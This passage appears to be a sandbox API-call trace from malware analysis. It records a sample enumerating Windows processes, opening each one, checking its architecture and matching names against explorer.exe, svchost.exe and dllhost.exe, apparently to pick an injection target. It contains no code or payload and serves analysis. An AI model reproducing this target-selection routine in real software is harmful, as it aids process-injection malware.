th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0217.215] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0217.216] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0217.216] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0217.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0217.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0217.218] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0217.218] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0217.219] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0217.219] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.219] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.219] CloseHandle (hObject=0xec) returned 1 [0217.219] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0217.220] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0217.220] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.220] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.220] CloseHandle (hObject=0xec) returned 1 [0217.220] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0217.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0217.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0217.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0217.222] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.222] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.222] CloseHandle (hObject=0xec) returned 1 [0217.222] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0217.222] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0217.222] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0217.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0217.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0217.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.223] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.223] CloseHandle (hObject=0xec) returned 1 [0217.223] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0217.223] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0217.223] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0217.223] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0217.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0217.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.223] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.224] CloseHandle (hObject=0xec) returned 1 [0217.224] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0217.224] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0217.224] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0217.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0217.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0217.224] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.224] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.224] CloseHandle (hObject=0xec) returned 1 [0217.224] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0217.224] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0217.224] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0217.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0217.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0217.225] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.225] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.225] CloseHandle (hObject=0xec) returned 1 [0217.225] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0217.225] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0217.225] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0217.225] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0217.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0217.226] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.226] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.226] CloseHandle (hObject=0xec) returned 1 [0217.226] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0217.226] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0217.226] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0217.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0217.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0217.226] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.226] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.226] CloseHandle (hObject=0xec) returned 1 [0217.226] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0217.226] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0217.226] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0217.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0217.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0217.227] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.227] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.227] CloseHandle (hObject=0xec) returned 1 [0217.227] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0217.227] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0217.227] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0217.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0217.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0217.228] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.228] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.228] CloseHandle (hObject=0xec) returned 1 [0217.228] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0217.228] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0217.228] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0217.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0217.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0217.228] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.228] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.228] CloseHandle (hObject=0xec) returned 1 [0217.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0217.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0217.228] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0217.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0217.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0217.229] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.229] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.229] CloseHandle (hObject=0xec) returned 1 [0217.229] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0217.229] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0217.229] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0217.229] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0217.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0217.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.230] CloseHandle (hObject=0xec) returned 1 [0217.230] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0217.230] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0217.230] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0217.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0217.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0217.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.230] CloseHandle (hObject=0xec) returned 1 [0217.230] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0217.230] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0217.230] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0217.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0217.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0217.231] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.231] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.231] CloseHandle (hObject=0xec) returned 1 [0217.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0217.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0217.231] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0217.231] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0217.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0217.232] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.232] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.232] CloseHandle (hObject=0xec) returned 1 [0217.232] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0217.232] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0217.232] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0217.232] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0217.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0217.232] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.232] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.232] CloseHandle (hObject=0xec) returned 1 [0217.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0217.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0217.233] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0217.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0217.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0217.233] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.233] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.233] CloseHandle (hObject=0xec) returned 1 [0217.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0217.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0217.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0217.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0217.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0217.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.234] CloseHandle (hObject=0xec) returned 1 [0217.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0217.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0217.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0217.234] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0217.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0217.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.234] CloseHandle (hObject=0xec) returned 1 [0217.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0217.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0217.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0217.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0217.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0217.235] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.235] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.235] CloseHandle (hObject=0xec) returned 1 [0217.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0217.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0217.235] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0217.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0217.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0217.236] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.236] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0217.236] CloseHandle (hObject=0xec) returned 1 [0217.236] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0217.236] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0217.236] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0217.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0217.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0217.236] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0217.237] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0217.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0217.237] Process32Next (in: 